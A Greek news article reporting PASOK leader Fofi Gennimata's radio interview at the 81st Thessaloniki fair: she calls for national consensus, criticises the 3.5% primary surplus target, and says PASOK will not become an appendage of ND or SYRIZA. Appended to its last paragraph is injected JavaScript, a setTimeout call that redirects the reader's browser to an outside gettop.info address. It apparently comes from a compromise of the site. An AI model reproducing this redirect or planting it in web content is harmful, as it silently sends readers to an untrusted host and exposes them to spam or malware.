Γεννηματά: Το ΠΑΣΟΚ δεν θα γίνει συμπλήρωμα ούτε της ΝΔ ούτε του ΣΥΡΙΖΑ

0
2

 

Την ανάγκη εθνικής συνεννόησης, εθνικής γραμμής με συμφωνημένες προοδευτικές μεταρρυθμίσεις, με μια κυβέρνηση η οποία θα είναι ευρύτατης κοινοβουλευτικής πλειοψηφίας και νέα συμφωνία με τους εταίρους, με έμφαση την ανάπτυξη, προέταξε σε συνέντευξή της στον ραδιοφωνικό σταθμό «Πρακτορείο 104,9 FM» η πρόεδρος του ΠΑΣΟΚ και επικεφαλής της Δημοκρατικής Συμπαράταξης, Φώφη Γεννηματά, στο πλαίσιο της περιοδείας της στην 81η ΔΕΘ.

Οι προοδευτικές μεταρρυθμίσεις, σημείωσε, «είναι το σημείο που πρέπει να βασιστούμε για να πείσουμε για την περαιτέρω αναδιάρθρωση του χρέους και την αλλαγή του στόχου για τα πρωτογενή πλεονάσματα» και προσέθεσε:

«Δεν μπορούμε να πετύχουμε τον στόχο που συμφώνησε ο κ. Τσίπρας για πρωτογενή πλεονάσματα 3,5% και ξέρετε τι σημαίνει αυτό; Σημαίνει ότι θα έρθει ο κόφτης και θα πέσει πάνω σε μισθούς και συντάξεις. Δηλαδή, νέες περικοπές για τους Έλληνες πολίτες, που εκτιμώ ότι δεν αντέχουν άλλο».

Επίσης, επανέλαβε την ανάγκη συγκρότησης αυτόνομου πολιτικού φορέα στον χώρο της Κεντροαριστεράς, με αυτοδύναμη στρατηγική και καθοριστικό ρόλο στις εξελίξεις κατέστησε σαφές ότι «το ΠΑΣΟΚ δεν θα γίνει συμπλήρωμα ούτε της ΝΔ ούτε του ΣΥΡΙΖΑ».

Στο πλαίσιο αυτό και ειδικότερα αναφερόμενη στον διάλογο του ΠΑΣΟΚ με το Ποτάμι για συμπόρευση στην Κεντροαριστερά, άφησε αιχμές στο Ποτάμι και την ηγεσία του για σκόπιμη καθυστέρηση και διγλωσσία, τονίζοντας πως έχει γίνει συμπλήρωμα της ΝΔ. «Ολοκληρώθηκε η συζήτηση για τις προγραμματικές θέσεις και εμφανίστηκε μια ανοιχτή επιστολή που έδειχνε ότι υπήρχε σκοπιμότητα για την καθυστέρηση, για τη διγλωσσία όλο το επόμενο διάστημα και σκοπιμότητα ότι η ηγεσία του Ποταμιού θέλει να γίνει συμπλήρωμα της ΝΔ» ανέφερε.

Παράλληλα, έστειλε το μήνυμα πως το ΠΑΣΟΚ συνεχίζει τον διάλογο με όσους πιστεύουν και αποδέχονται το πολιτικό πλαίσιο που έχει τεθεί, σημειώνοντας ότι «ήταν πολύ ξεκάθαρο το στίγμα του». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here